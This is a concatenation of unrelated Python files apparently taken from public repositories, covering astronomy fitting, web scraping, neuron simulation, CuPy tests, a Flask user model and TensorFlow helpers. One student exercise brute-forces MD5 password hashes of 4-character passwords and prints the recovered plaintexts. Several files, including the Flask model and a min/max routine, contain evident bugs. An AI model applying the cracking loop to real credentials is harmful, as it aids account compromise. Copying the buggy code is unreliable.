# n = 2.6
# indice = Elim(pmRAs,pmDEs, e_pmRA,e_pmDE, n)
# npmRA = np.take(pmRA, indice)
# npmDE = np.take(pmDE, indice)
# ne_pmRA = np.take(e_pmRA, indice)
# ne_pmDE = np.take(e_pmDE, indice)
# nRA = np.take(RA, indice)
# nDE = np.take(DE, indice)
#
# print>>flog, 'Eliminating(%2.1f-sigma): %d Outliers.'%(n,len(pmRA)-len(npmRA))
#
# w, sig, corrcoef = RotationFit(npmRA,npmDE,ne_pmRA,ne_pmDE,nRA,nDE)
### Calculate the residuals again
# wx = w[0]
# wy = w[1]
# wz = w[2]
#
# npmRAf = -sin(nDE)*cos(nRA)*wx-sin(nDE)*sin(nRA)*wy+cos(nDE)*wz
# npmDEf = sin(nRA)*wx-cos(nRA)*wy
#
### residuals
# npmRAs = npmRAf - npmRA
# npmDEs = npmDEf - npmDE
#
## res = np.hstack((npmRAs/ne_pmRA**2, npmDEs/ne_pmDE**2))
# wrmsRA = np.sqrt(np.sum(npmRAs**2/ne_pmRA**2)/np.sum(ne_pmRA**-2))
# wrmsDE = np.sqrt(np.sum(npmDEs**2/ne_pmDE**2)/np.sum(ne_pmDE**-2))
#
# print>>flog, 'After eliminating outliers, the orientation/spin are(mas/mas*yr-1):\n ',w
# print>>flog, ' sigma are(mas/mas*yr-1):\n', sig
# print>>flog, ' correlation coefficients are:\n', corrcoef
# print>>flog, ' w.r.m.s(mas/mas*yr-1) is:\n', wrmsRA, wrmsDE
#
# return w, sig, corrcoef, wrmsRA, wrmsDE
#
#def SpinFit(pmRA,pmDE,e_pmRA,e_pmDE,RA,DE, flog):
#### First Loop, calculate the mean error without weights.
# np.ones(len(pmRA))
# print>>flog, 'First, no weight apply to the data. Calculate the w.r.m.s'
# w, sig, corrcoef, wrmsRA, wrmsDE = loop(pmRA,pmDE,np.ones(len(pmRA)),np.ones(len(pmDE)),RA,DE, flog)
# merrRA, merrDE = wrmsRA, wrmsDE
#
### Next, apply the weigths of M_err**2/err_i**2
# print>>flog, 'Next, apply the weigths of M_err**2/err_i**2'
# w, sig, corrcoef, wrmsRA, wrmsDE = loop(pmRA,pmDE,e_pmRA/merrRA,e_pmDE/merrDE,RA,DE, flog)
###############################################################################
## Main function | Niu-Liu/thesis-materials | gaia-crf1/OLeqnFit.py | OLeqnFit.py | py | 3,982 | python | en | code | 0 | github-code | 36 |
22108118261 | #!/usr/bin/env python
# coding: utf-8
# Loading the libraries
import requests
from bs4 import BeautifulSoup
import time
import random
from tqdm.notebook import tqdm as tqdm
# Part a
page_url = "https://www.barnesandnoble.com/b/books/_/N-1fZ29Z8q8?Nrpp=40&page=1"
headers = {"user-agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36"}
search_page = requests.get(page_url, headers=headers)
page_info = BeautifulSoup(search_page.content, "html.parser")
# Part b
url_prefix = "https://www.barnesandnoble.com"
list_product_header = page_info.find_all("h3", class_ = "product-info-title")
list_product_urls = []
product_dict = dict()
for i, product in enumerate(list_product_header):
product_url = url_prefix + product.find("a")['href']
list_product_urls = list_product_urls + [product_url]
product_name = product.find("a").text
product_dict[i+1] = product_name
# Part c
base_fname = "top100_bn_"
for i, product_url in enumerate(list_product_urls):
product_search = requests.get(product_url, headers=headers)
fname = f"{base_fname}_{i+1}.html"
with open(fname,"a+") as f:
f.write(str(product_search.content))
f.close()
# Adding sleep time
sleep_time = random.randint(5,10)
time.sleep(sleep_time)
# Part d
prod_count = len(list_product_header)
for i in range(prod_count):
fname = f"{base_fname}_{i+1}.html"
with open(fname, "r") as f:
page_content = BeautifulSoup(f, "html.parser")
f.close()
overview_box = page_content.find("div", class_ = "content overview-expandable-section")
overview_content = overview_box.find("div", class_ = "overview-cntnt")
print(f"Overview content for '{product_dict[i+1]}'")
print(overview_content.text[:100])
print("") | jeetp465/Web-Scraping | Barnes and Noble Scraping.py | Barnes and Noble Scraping.py | py | 1,841 | python | en | code | 0 | github-code | 36 |
1252647732 | class MiddleoftheLinkedList(object):
def middleNode(self, head):
A = [head]
while A[-1].next:
A.append(A[-1].next)
return A[len(A) // 2]
class ListNode:
def __init__(self, x):
self.val = x
self.next = None
if __name__ == '__main__':
a = MiddleoftheLinkedList()
h1 = ListNode(1)
h2 = ListNode(2)
h3 = ListNode(3)
h4 = ListNode(4)
h5 = ListNode(5)
h6 = ListNode(6)
h1.next = h2
h2.next = h3
h3.next = h4
h4.next = h5
h5.next = h6
print(a.middleNode(h1).val)
print(a.middleNode(h2).val)
print(a.middleNode(h3).val)
print(a.middleNode(h4).val)
| lyk4411/untitled | beginPython/leetcode/MiddleoftheLinkedList.py | MiddleoftheLinkedList.py | py | 669 | python | en | code | 0 | github-code | 36 |
40935361016 | list = []
dataIn = None
def printLowHigh(list):
high = list[0]
low = list[0]
for i in range(len(list)):
if i < low:
low = list[i]
if i > high:
high = list[i]
print (low, high)
def Promedio(list):
suma = 0
for i in range(len(list)):
suma = suma + list[i]
promedio = suma / len(list)
return promedio
while True:
dataIn=int(input("ingrese el valor "))
if dataIn == -1:
break
list.append(int(dataIn))
printLowHigh(list)
print (Promedio(list))
| carlitomm/python_prog_course | 1ejercicios_clases/eje8.py | eje8.py | py | 544 | python | en | code | 0 | github-code | 36 |
2457622473 |
# This Python code reproduces the upper and low panel of Fig. 6 in Clay et. al. (2008).
#Save the voltage nd time series csv files as v1.csv for the standard HH model (top panel of fig.6 and v2.csv for the revised model (bottom panel for of fig. 6)
from neuron import h
import numpy as np
import matplotlib.pyplot as plt
import timeit
import subprocess
import math
def initialize():
h.finitialize()
h.fcurrent()
def integrate():
    """Re-initialize, then step the NEURON simulation forward (h.fadvance)
    until the global time h.t reaches the script-level tstop."""
    #g.begin()
    h.finitialize()
    while h.t<tstop:
        h.fadvance()
cell=h.Section()
nseg=9
cell.nseg=nseg # number of segments
cell.Ra=35.4 # ohm*cm # cable resistance
cell.cm=1
l=1# length of the axon in mm
cell.L=l*1000 # length of the axon in um to be read into NEURON
cell.diam=500 # diameter of the axon in um
#insert the mechanism
#cell.insert('kext_clay') #in case the potassium accumulation is used.
cell.insert('hh') #inserting Clay revised HH model
#cell.insert('hh') # Standard Hodgkin Huxley model
cell.ek = -72
cell.ena = 55
#Stimulation current
stim1=h.IClamp(0,sec=cell)
stim1.delay=100 #ms
stim1.dur=80 #ms
stim1.amp= 250 #nA
#print stim_density * 1000 * area
vec={}
for var in 'i','t','v':
vec[var]=h.Vector()
vec['t'].record(h._ref_t)
vec['v'].record(cell(0.99)._ref_v)
vec['i'].record(stim1._ref_i)
tstop=200
h.dt=0.01
initialize()
integrate()
np.savetxt('v1.csv', vec['v'], delimiter= ',')
np.savetxt('time.csv', vec['t'], delimiter= ',') # saving the time series
cell2=h.Section()
nseg=9
cell2.nseg=nseg # number of segments
cell2.Ra=35.4 # ohm*cm # cable resistance
cell2.cm=1
l=1# length of the axon in mm
cell2.L=l*1000 # length of the axon in um to be read into NEURON
cell2.diam=500 # diameter of the axon in um
#insert the mechanism
cell2.insert('hhrx_clay_2') #inserting Clay revised HH model
cell2.ek = -72
cell2.ena = 55
vec['v2'] = h.Vector()
vec['v2'].record(cell2(0.99)._ref_v)
#Stimulation current
stim1=h.IClamp(0,sec=cell2)
stim1.delay=100 #ms
stim1.dur=80 #ms
stim1.amp= 250 #nA
tstop=200
h.dt=0.01
initialize()
integrate()
np.savetxt('v2.csv', vec['v2'], delimiter= ',')
## code for plotting the results
v1 = np.genfromtxt('v1.csv',delimiter=',')
v2 = np.genfromtxt('v2.csv',delimiter=',')
time = np.genfromtxt('time.csv', delimiter= ',')
fig = plt.figure()
ax = fig.add_subplot(2,1,1)
plt.plot(time,v1)
plt.xlabel( 'Time (ms)')
plt.ylabel(' Voltage (mV)')
plt.text(140,20, 'HH', fontsize = 12)
plt.xlim(80,200)
ax.set_xticklabels([])
ax.set_xticks([])
ax.set_yticklabels([])
ax.set_yticks([])
plt.ylim(-75,60)
plt.plot((100,180), (50,50), color = 'k', linewidth = 2)
plt.plot((185,185), (-50,0), color = 'k', linewidth = 2)
plt.text(187,-50, '-50', fontsize = 12)
plt.text(187,0, '0 mV', fontsize = 12)
ax = fig.add_subplot(2,1,2)
plt.plot(time,v2)
plt.xlim(80,200)
plt.xlabel( 'Time (ms)')
plt.ylabel(' Voltage (mV)')
plt.text(140,20, 'Clay, et. al. (2008)', fontsize = 12)
ax.set_xticklabels([])
ax.set_xticks([])
ax.set_yticklabels([])
ax.set_yticks([])
plt.ylim(-75,60)
plt.plot((185,185), (-50,0), color = 'k', linewidth = 2)
plt.plot((125,175), (0,0), color = 'k', linewidth = 2)
plt.text(187,-50, '-50', fontsize = 12)
plt.text(187,0, '0 mV', fontsize = 12)
plt.text(145,-15, '50 ms', fontsize = 12)
try:
plt.savefig('clay_mohit.jpeg',dpi=600, format='jpeg', bbox_inches='tight')
except:
plt.savefig('clay_mohit.jpeg',dpi=600, format='jpeg') # incase bbox_inches failes
plt.show()
| ModelDBRepository/189922 | clay_mohit.py | clay_mohit.py | py | 3,447 | python | en | code | 0 | github-code | 36 |
34357549837 | import argparse
import modelsim_utils
import time
# Parse command-line options and hand the .do file to the ModelSim
# automation helper.
parser = argparse.ArgumentParser()
parser.add_argument('-d', '--do_file_name' , default = 'run_cmd.do')
parser.add_argument('-r', '--run_to_pane_shift_sleep_sec', default = 4) # 7
parser.add_argument('-t','--true_or_false_flag_example', action='store_true') # true if add flag to cmd line, false if don't
args = parser.parse_args()
# Short pause before driving the simulator.
time.sleep(1)
modelsim_utils.auto_run(args.do_file_name, int(args.run_to_pane_shift_sleep_sec))
| Brandon-Valley/examples | python/script_arg_parse.py | script_arg_parse.py | py | 496 | python | zh | code | 0 | github-code | 36 |
39755602271 | # @Author : tony
# @Date : 2021/5/2
# @Title : epjb2009 paper practice
# @Dec : deal with the dataset
import networkx as nx
# deal with the INT dataset
def readINT(dataUrl):
    """Read the INT GML graph and return its edges as [src_id, dst_id] pairs.

    Integer node labels are remapped to consecutive 0-based ids in node
    order; each remapped edge is also echoed to stdout.
    """
    graph = nx.read_gml(dataUrl)
    label_to_id = {int(label): idx for idx, label in enumerate(graph.nodes())}
    edges = []
    for v0, v1 in graph.edges:
        pair = [label_to_id[int(v0)], label_to_id[int(v1)]]
        print(pair[0], pair[1])
        edges.append(pair)
    return edges
# deal with the INT dataset
def readPB(dataUrl):
    """Read the Political-Blogs GML graph and return edges as [src_id, dst_id] pairs.

    String node labels are remapped to consecutive 0-based ids in node order;
    every node mapping and every edge is echoed to stdout for inspection.
    """
    G = nx.read_gml(dataUrl)
    list = dict()
    edge_list = []
    for id, label in enumerate(G.nodes()):
        list[label] = int(id)
        print(id, label)
    for (v0, v1) in G.edges:
        print(v0, v1)
        print(list[v0], list[v1])
        edge_list.append([list[v0], list[v1]])
    return edge_list
# deal with the Grid dataset
def readGrid(dataUrl):
    """Read the Power-Grid GML graph (nodes keyed by 'id') and return edges
    as [src_id, dst_id] pairs.

    Node ids are remapped to consecutive 0-based ids in node order; every
    node mapping and every edge is echoed to stdout for inspection.
    """
    G = nx.read_gml(dataUrl, label='id')
    list = dict()
    edge_list = []
    for id, label in enumerate(G.nodes()):
        list[int(label)] = int(id)
        print(id, label)
    for (v0, v1) in G.edges:
        print(v0, v1)
        print(list[v0], list[v1])
        edge_list.append([list[v0], list[v1]])
    return edge_list
# save the txt
def save(edgeIdList, fileName):
    """Write one "src dst" pair per line to *fileName*, overwriting it.

    Improvements over the original: a context manager guarantees the file is
    closed even if the write fails, and str.join replaces the quadratic
    string `+=` accumulation. Output bytes are identical.
    """
    lines = ''.join(f'{item[0]} {item[1]}\n' for item in edgeIdList)
    with open(fileName, 'w') as f:
        f.write(lines)
if __name__ == '__main__':
# print('------------- SRART Internet-------------')
# edge_list = readINT('./data gml/INT.gml')
# save(edge_list, './data gml/Internet.txt')
# print('------------- Internet END -------------')
# print('------------- SRART Political blogs-------------')
# edge_list = readPB('./data gml/PB.gml')
# print(edge_list)
# save(edge_list, './data gml/Political blogs.txt')
# print('------------- Political blogs END -------------')
print('------------- SRART Power grid-------------')
edge_list = readGrid('./data gml/Grid.gml')
print(edge_list)
save(edge_list, 'data gml/Power grid.txt')
print('------------- Power grid END -------------') | DDMXIE/LinkPrediction | practice/dataTransform.py | dataTransform.py | py | 2,178 | python | en | code | 0 | github-code | 36 |
8446001098 | import unittest
import pytest
from cupy_backends.cuda import stream as stream_module
import cupy
from cupy import _core
from cupy import testing
# TODO(leofang): test PTDS in this file
class DummyObjectWithCudaArrayInterface(object):
    """Minimal wrapper exposing a cupy array via ``__cuda_array_interface__``.

    ``ver`` selects which protocol version the descriptor mimics; version 3
    additionally advertises the producing stream.
    """
    def __init__(self, a, ver=3):
        # a: the wrapped cupy ndarray; ver: CUDA Array Interface version to emit
        self.a = a
        self.ver = ver

    @property
    def __cuda_array_interface__(self):
        desc = {
            'shape': self.a.shape,
            'strides': self.a.strides,
            'typestr': self.a.dtype.str,
            'descr': self.a.dtype.descr,
            'data': (self.a.data.ptr, False),
            'version': self.ver,
        }
        if self.ver == 3:
            # v3 adds a 'stream' entry; the legacy default stream (ptr 0)
            # is encoded as 1 here.
            stream = cupy.cuda.get_current_stream()
            desc['stream'] = 1 if stream.ptr == 0 else stream.ptr
        return desc
@testing.parameterize(*testing.product({
'stream': ('null', 'new'),
'ver': (2, 3),
}))
@pytest.mark.skipif(cupy.cuda.runtime.is_hip,
reason='HIP does not support this')
class TestArrayUfunc(unittest.TestCase):
def setUp(self):
if self.stream == 'null':
self.stream = cupy.cuda.Stream.null
elif self.stream == 'new':
self.stream = cupy.cuda.Stream()
@testing.for_all_dtypes_combination(names=['x_type', 'y_type'])
@testing.numpy_cupy_allclose(rtol=1e-6, accept_error=TypeError,
contiguous_check=False)
def check_array_scalar_op(self, op, xp, x_type, y_type, trans=False):
a = xp.array([[1, 2, 3], [4, 5, 6]], x_type)
if trans:
a = a.T
if xp is cupy:
with self.stream:
a = DummyObjectWithCudaArrayInterface(a, self.ver)
return getattr(xp, op)(a, y_type(3))
else:
return getattr(xp, op)(a, y_type(3))
def test_add_scalar(self):
self.check_array_scalar_op('add')
def test_add_scalar_with_strides(self):
self.check_array_scalar_op('add', trans=True)
@testing.parameterize(*testing.product({
'stream': ('null', 'new'),
'ver': (2, 3),
}))
@pytest.mark.skipif(cupy.cuda.runtime.is_hip,
reason='HIP does not support this')
class TestElementwiseKernel(unittest.TestCase):
def setUp(self):
if self.stream == 'null':
self.stream = cupy.cuda.Stream.null
elif self.stream == 'new':
self.stream = cupy.cuda.Stream()
@testing.for_all_dtypes_combination()
@testing.numpy_cupy_allclose(rtol=1e-6, accept_error=TypeError,
contiguous_check=False)
def check_array_scalar_op(self, op, xp, dtyes, trans=False):
a = xp.array([[1, 2, 3], [4, 5, 6]], dtyes)
if trans:
a = a.T
if xp is cupy:
with self.stream:
a = DummyObjectWithCudaArrayInterface(a, self.ver)
f = cupy.ElementwiseKernel('T x, T y', 'T z', 'z = x + y')
return f(a, dtyes(3))
else:
return a + dtyes(3)
def test_add_scalar(self):
self.check_array_scalar_op('add')
def test_add_scalar_with_strides(self):
self.check_array_scalar_op('add', trans=True)
@testing.parameterize(*testing.product({
'stream': ('null', 'new'),
'ver': (2, 3),
}))
@pytest.mark.skipif(cupy.cuda.runtime.is_hip,
reason='HIP does not support this')
class TestSimpleReductionFunction(unittest.TestCase):
def setUp(self):
if self.stream == 'null':
self.stream = cupy.cuda.Stream.null
elif self.stream == 'new':
self.stream = cupy.cuda.Stream()
self.my_int8_sum = _core.create_reduction_func(
'my_sum', ('b->b',), ('in0', 'a + b', 'out0 = a', None))
@testing.numpy_cupy_allclose()
def check_int8_sum(self, shape, xp, axis=None, keepdims=False,
trans=False):
a = testing.shaped_random(shape, xp, 'b')
if trans:
a = a.T
if xp == cupy:
with self.stream:
a = DummyObjectWithCudaArrayInterface(a, self.ver)
return self.my_int8_sum(
a, axis=axis, keepdims=keepdims)
else:
return a.sum(axis=axis, keepdims=keepdims, dtype='b')
def test_shape(self):
self.check_int8_sum((2 ** 10,))
def test_shape_with_strides(self):
self.check_int8_sum((2 ** 10, 16), trans=True)
@testing.parameterize(*testing.product({
'stream': ('null', 'new'),
'ver': (2, 3),
}))
@pytest.mark.skipif(cupy.cuda.runtime.is_hip,
reason='HIP does not support this')
class TestReductionKernel(unittest.TestCase):
def setUp(self):
if self.stream == 'null':
self.stream = cupy.cuda.Stream.null
elif self.stream == 'new':
self.stream = cupy.cuda.Stream()
self.my_sum = _core.ReductionKernel(
'T x', 'T out', 'x', 'a + b', 'out = a', '0', 'my_sum')
@testing.numpy_cupy_allclose()
def check_int8_sum(self, shape, xp, axis=None, keepdims=False,
trans=False):
a = testing.shaped_random(shape, xp, 'b')
if trans:
a = a.T
if xp == cupy:
with self.stream:
a = DummyObjectWithCudaArrayInterface(a, self.ver)
return self.my_sum(
a, axis=axis, keepdims=keepdims)
else:
return a.sum(axis=axis, keepdims=keepdims, dtype='b')
def test_shape(self):
self.check_int8_sum((2 ** 10,))
def test_shape_with_strides(self):
self.check_int8_sum((2 ** 10, 16), trans=True)
@testing.parameterize(
{'shape': (10,), 'slices': (slice(0, None),)},
{'shape': (10,), 'slices': (slice(2, None),)},
{'shape': (10, 10), 'slices': (slice(0, None), slice(0, None))},
{'shape': (10, 10), 'slices': (slice(0, None), slice(2, None))},
{'shape': (10, 10), 'slices': (slice(2, None), slice(0, None))},
{'shape': (10, 10), 'slices': (slice(2, None), slice(2, None))},
{'shape': (10, 10), 'slices': (slice(2, None), slice(4, None))},
)
@pytest.mark.skipif(cupy.cuda.runtime.is_hip,
reason='HIP does not support this')
class TestSlicingMemoryPointer(unittest.TestCase):
@testing.for_all_dtypes_combination(names=['dtype'])
@testing.for_orders('CF')
def test_shape_with_strides(self, dtype, order):
x = cupy.zeros(self.shape, dtype=dtype, order=order)
start = [s.start for s in self.slices]
itemsize = cupy.dtype(dtype).itemsize
dimsize = [s * itemsize for s in start]
if len(self.shape) == 1:
offset = start[0] * itemsize
else:
if order == 'C':
offset = self.shape[0] * dimsize[0] + dimsize[1]
else:
offset = self.shape[0] * dimsize[1] + dimsize[0]
cai_ptr, _ = x.__cuda_array_interface__['data']
slice_cai_ptr, _ = x[self.slices].__cuda_array_interface__['data']
cupy_data_ptr = x.data.ptr
sliced_cupy_data_ptr = x[self.slices].data.ptr
assert cai_ptr == cupy_data_ptr
assert slice_cai_ptr == sliced_cupy_data_ptr
assert slice_cai_ptr == cai_ptr+offset
test_cases = [
{'shape': (10,), 'slices': (slice(0, None),)},
{'shape': (10,), 'slices': (slice(2, None),)},
{'shape': (10, 10), 'slices': (slice(0, None), slice(0, None))},
{'shape': (10, 10), 'slices': (slice(0, None), slice(2, None))},
{'shape': (10, 10), 'slices': (slice(2, None), slice(0, None))},
{'shape': (10, 10), 'slices': (slice(2, None), slice(2, None))},
{'shape': (10, 10), 'slices': (slice(2, None), slice(4, None))},
]
test_streams = ('null', 'new')
test_cases_with_stream = [
{'stream': s, **t} for t in test_cases for s in test_streams]
@testing.parameterize(*test_cases_with_stream)
@pytest.mark.skipif(cupy.cuda.runtime.is_hip,
reason='HIP does not support this')
class TestCUDAArrayInterfaceCompliance(unittest.TestCase):
def setUp(self):
if self.stream == 'null':
self.stream = cupy.cuda.Stream.null
elif self.stream == 'new':
self.stream = cupy.cuda.Stream()
@testing.for_all_dtypes_combination(names=['dtype'])
@testing.for_orders('CF')
def test_value_type(self, dtype, order):
x = cupy.zeros(self.shape, dtype=dtype, order=order)
y = x[self.slices]
# mandatory entries
with self.stream:
CAI = y.__cuda_array_interface__
shape = CAI['shape']
typestr = CAI['typestr']
ptr, readonly = CAI['data']
version = CAI['version']
strides = CAI['strides']
# optional entries
descr = CAI['descr'] if 'descr' in CAI else None
stream = CAI['stream'] if 'stream' in CAI else None
# Don't validate correctness of data here, just their types
assert version == 3 # bump this when the protocol is updated!
assert isinstance(CAI, dict)
assert isinstance(shape, tuple)
assert isinstance(typestr, str)
assert isinstance(ptr, int)
assert isinstance(readonly, bool)
assert (strides is None) or isinstance(strides, tuple)
assert (descr is None) or isinstance(descr, list)
if isinstance(descr, list):
for item in descr:
assert isinstance(item, tuple)
assert (stream is None) or isinstance(stream, int)
@testing.parameterize(*testing.product({
'stream': ('null', 'new', 'ptds'),
}))
@pytest.mark.skipif(cupy.cuda.runtime.is_hip,
reason='HIP does not support this')
class TestCUDAArrayInterfaceStream(unittest.TestCase):
def setUp(self):
if self.stream == 'null':
self.stream = cupy.cuda.Stream.null
elif self.stream == 'new':
self.stream = cupy.cuda.Stream()
elif self.stream == 'ptds':
self.stream = cupy.cuda.Stream.ptds
def test_stream_export(self):
a = cupy.empty(100)
# the stream context should export the stream
with self.stream:
stream_ptr = a.__cuda_array_interface__['stream']
if self.stream is cupy.cuda.Stream.null:
assert stream_ptr == stream_module.get_default_stream_ptr()
elif self.stream is cupy.cuda.Stream.ptds:
assert stream_ptr == 2
else:
assert stream_ptr == self.stream.ptr
# without a stream context, it's always the default stream
stream_ptr = a.__cuda_array_interface__['stream']
assert stream_ptr == stream_module.get_default_stream_ptr()
| cupy/cupy | tests/cupy_tests/core_tests/test_ndarray_cuda_array_interface.py | test_ndarray_cuda_array_interface.py | py | 10,691 | python | en | code | 7,341 | github-code | 36 |
2285653529 | #Item 1 #############################################################################################################
import hashlib
from random import randint
def cadastrar(nome, senha):
    """Append *nome* and the hex MD5 digest of *senha* to the registry file.

    The file is opened in append mode so earlier registrations are kept.
    """
    hashed = hashlib.md5(senha.encode('utf-8')).hexdigest()
    with open("UsuariosCadastrados.txt", "a") as stream:
        print(nome, hashed, file=stream)
def md5(senha):
    """Return the hex MD5 digest of the UTF-8 encoding of *senha*."""
    return hashlib.md5(senha.encode('utf-8')).hexdigest()
def autenticar(nome,senha):
    """Check *nome*/*senha* against the in-memory registry and print the result.

    NOTE(review): listaUsu interleaves [name, password, name, password, ...];
    list.index(nome) returns the FIRST occurrence, so a password that equals
    some user name would be treated as a name slot — confirm this is intended.
    Also note the comparison is against the plain-text password kept in
    memory, while only the MD5 hash is written to disk.
    """
    if nome in listaUsu:
        z = listaUsu.index(nome)
        if senha == listaUsu[z+1]:
            print("Autentificacao efetuada com sucesso. Bem vindo ", nome)
        else:
            print("Nome ou senha invalidos.")
    else:
        print("Nome ou senha invalidos.")
listaUsu = []
listaHash = []
a = 1
while a == 1:
nomeCadast = input("Digite um nome (de 4 caracteres) para cadastro: ")
senhaCadast = input("Digite uma senha (de 4 caracteres) para cadastro: ")
ativa = 1
if ativa ==1:
if (len(nomeCadast) or len(senhaCadast)) >4:
print("Nome ou Senha digitado esta fora dos limites.")
else:
listaUsu.append(nomeCadast)
listaUsu.append(senhaCadast)
senhaHash = md5(senhaCadast)
listaHash.append(senhaHash)
cadastrar(nomeCadast, senhaCadast)
a = int(input("Digite (0) se quiser parar de fazer cadastros, ou (1) para continuar: "))
fazer = int(input("Digite (1) se deseja autentificar, ou (0) para sair: "))
if fazer == 1:
nomeAutent = input("Digite seu nome para Login: ")
senhaAutent = input("Digite sua senha para Login: ")
autenticar(nomeAutent,senhaAutent)
print("\n")
##Item 2: quebra md5 ################################################################################################
#import hashlib
import string
import datetime
from datetime import timedelta
def quebraMd5(senha1,senha2,senha3,senha4):
    """Brute-force four MD5 hashes of 4-character passwords drawn from
    string.printable, printing each recovered password and its timing.

    NOTE(review): the `break` after all four hashes are found only exits the
    innermost loop, so the outer loops keep scanning — confirm whether a full
    stop (e.g. a return) was intended. `startTime` is reset after each find,
    so "Tempo necessário" measures time since the previous find.
    """
    hashes = [senha1, senha2, senha3, senha4]
    startTime = datetime.datetime.now()
    tempo_comeco = datetime.datetime.now()
    x = 0  # number of hashes cracked so far
    # diminui = timedelta(seconds=1) --> in case you want to subtract a fixed amount of time
    for a in string.printable:
        for b in string.printable:
            for c in string.printable:
                for d in string.printable:
                    word = a + b + c + d
                    hash = hashlib.md5(word.encode("utf-8")).hexdigest()
                    # print(str(hash))
                    if hash in hashes:
                        end_time = str(datetime.datetime.now() - startTime).split('.')[0]
                        print("Senha Hash quebrada com sucesso!!")
                        print("Senha original: ", word)
                        print("Codigo HASH: ", hash)
                        print("Tempo necessário: ", end_time)
                        print("\n")
                        startTime = datetime.datetime.now()
                        x = x + 1
                        if x >= len(hashes):
                            tempo_final = str(datetime.datetime.now() - tempo_comeco).split('.')[0]
                            print("Tempo total: ", tempo_final)
                            break
senha1 = listaHash[0]
senha2 = listaHash[1]
senha3 = listaHash[2]
senha4 = listaHash[3]
quebraMd5(senha1,senha2,senha3,senha4)
#Item 3 ##############################################################################################################
def crip(texto, chave):
    """Caesar-shift *texto* by *chave* positions and return the result.

    Lowercase letters wrap within a-z and digits wrap within 0-9; spaces are
    kept verbatim. Any other character (uppercase, punctuation, ...) is
    silently dropped, exactly as in the original implementation.
    """
    out = []
    for ch in texto:
        if ch == " ":
            out.append(" ")
        elif "a" <= ch <= "z":
            shifted = ord(ch) + chave
            if shifted > ord("z"):
                # Wrap past 'z' back to the start of the alphabet.
                shifted = ord("a") - 1 + (shifted - ord("z"))
            out.append(chr(shifted))
        elif "0" <= ch <= "9":
            shifted = ord(ch) + chave
            if shifted > ord("9"):
                # Wrap past '9' back to '0'.
                shifted = ord("0") - 1 + (shifted - ord("9"))
            out.append(chr(shifted))
    return "".join(out)
chaveRandom1 = randint(1,9)
senhaProte1 = crip(senha1,chaveRandom1)
chaveRandom2 = randint(1,9)
senhaProte2 = crip(senha2,chaveRandom2)
chaveRandom3 = randint(1,9)
senhaProte3 = crip(senha3,chaveRandom3)
chaveRandom4 = randint(1,9)
senhaProte4 = crip(senha4,chaveRandom4)
with open("HASHSModificados.txt", "a") as stream: # usa "w" para não armazenar mais de 1 palavra
print(senhaProte1, senhaProte2, senhaProte3, senhaProte4, file=stream)
print("\n")
print(f"Novo Hash Protegido de {listaUsu[0]} - {senhaProte1}")
print(f"Novo Hash Protegido de {listaUsu[2]} - {senhaProte2}")
print(f"Novo Hash Protegido de {listaUsu[4]} - {senhaProte3}")
print(f"Novo Hash Protegido de {listaUsu[6]} - {senhaProte4}") | Williamsbsa/Quebra-de-Hash-MD5-Python | QuebradeHashMd5.py | QuebradeHashMd5.py | py | 5,406 | python | pt | code | 0 | github-code | 36 |
32336318719 | from flask_app.config.mysqlconnection import connectToMySQL
class User:
    """Model class mapping rows of the ``users`` table (users_schema database)."""

    def __init__(self, data):
        self.id = data['id']
        self.first_name = data['first_name']
        self.last_name = data['last_name']
        self.email = data['email']
        self.created_at = data['created_at']
        self.updated_at = data['updated_at']

    @classmethod
    def get_all_users(cls):
        """Return every row of the users table as a list of User instances."""
        query = "SELECT * FROM users;"
        users_from_db = connectToMySQL("users_schema").query_db(query)
        users_list = []
        for user in users_from_db:
            users_list.append(cls(user))
        # Bug fix: the original returned the undefined name `users` (NameError).
        return users_list

    @classmethod
    def get_one_user(cls, data):
        """Return the User matching data['id'], or None if no such row exists.

        Bug fix: the original selected ALL rows and then called cls() with no
        arguments, which raised TypeError unconditionally.
        """
        query = "SELECT * FROM users WHERE id = %(id)s;"
        results = connectToMySQL("users_schema").query_db(query, data)
        if not results:
            return None
        return cls(results[0])

    @classmethod
    def create(cls, data):
        """Insert a new user (keys: fname, lname, email); return the new row id."""
        query = "INSERT INTO users (first_name, last_name, email, created_at, updated_at) VALUES (%(fname)s, %(lname)s, %(email)s, NOW(), NOW());"
        users_id = connectToMySQL("users_schema").query_db(query, data)
        return users_id

    @classmethod
    def delete_user(cls, data):
        """Delete the user matching data['id']."""
        # Bug fix: the original deleted from the unrelated `dogs` table.
        query = "DELETE FROM users WHERE id = %(id)s"
        connectToMySQL("users_schema").query_db(query, data)

    @classmethod
    def update_user(cls, data):
        """Update name/email fields of the user matching data['id']."""
        query = "UPDATE users SET first_name = %(fname)s, last_name = %(lname)s, email = %(email)s, updated_at = NOW() WHERE id = %(id)s"
        results = connectToMySQL("users_schema").query_db(query, data)
        return results
return results | JBShort/post-Bootcamp-Python | flask_mysql/Users_CRUD_Modularized/flask_app/models/user.py | user.py | py | 1,593 | python | en | code | 0 | github-code | 36 |
18605057627 | import tensorflow as tf
from QingDaoCoRec.CoRec import input_data
import os
import csv
import time
import numpy as np
dir = 'MODEL'
mod_name = 'model'
mod_cnt = 0
mod_end = '.ckpt'
batch_size = 100
def wei_mat(shape):
    """Return a trainable tf.Variable of *shape*, truncated-normal init (stddev 0.1)."""
    ini = tf.random.truncated_normal(shape, stddev=0.1)
    return tf.Variable(ini)
def bias_mat(shape):
    """Return a trainable float32 tf.Variable of *shape*, filled with 0.1."""
    ini = tf.constant(0.1, dtype=tf.float32, shape=shape)
    return tf.Variable(ini)
def conv_1d(x_, W):
    """1-D convolution of x_ with kernel W, stride 1, SAME padding."""
    return tf.nn.conv1d(x_, W, 1, padding='SAME')
def max_pool(x_):
    """2x2 max pooling with stride 2 and SAME padding."""
    return tf.nn.max_pool2d(x_, ksize=[1, 2, 2, 1], strides=[1, 2, 2, 1], padding='SAME')
def mean_pool(x_):
    """2x2 average pooling with stride 2 and SAME padding."""
    return tf.nn.avg_pool2d(x_, ksize=[1, 2, 2, 1], strides=[1, 2, 2, 1], padding='SAME')
def multi(x_, W):
    """Matrix product x_ @ W."""
    return tf.matmul(x_, W)
def save_model(sess, directory_name, model_name):
    """Persist the TF1 session's variables to <cwd>/<directory_name>/<model_name>."""
    # save arguments
    saver = tf.compat.v1.train.Saver()
    directory_path = os.getcwd()
    directory_path = os.path.join(directory_path, directory_name)
    # NOTE(review): existence is tested on the relative name while mkdir gets
    # the absolute path — equivalent only while cwd is unchanged; confirm.
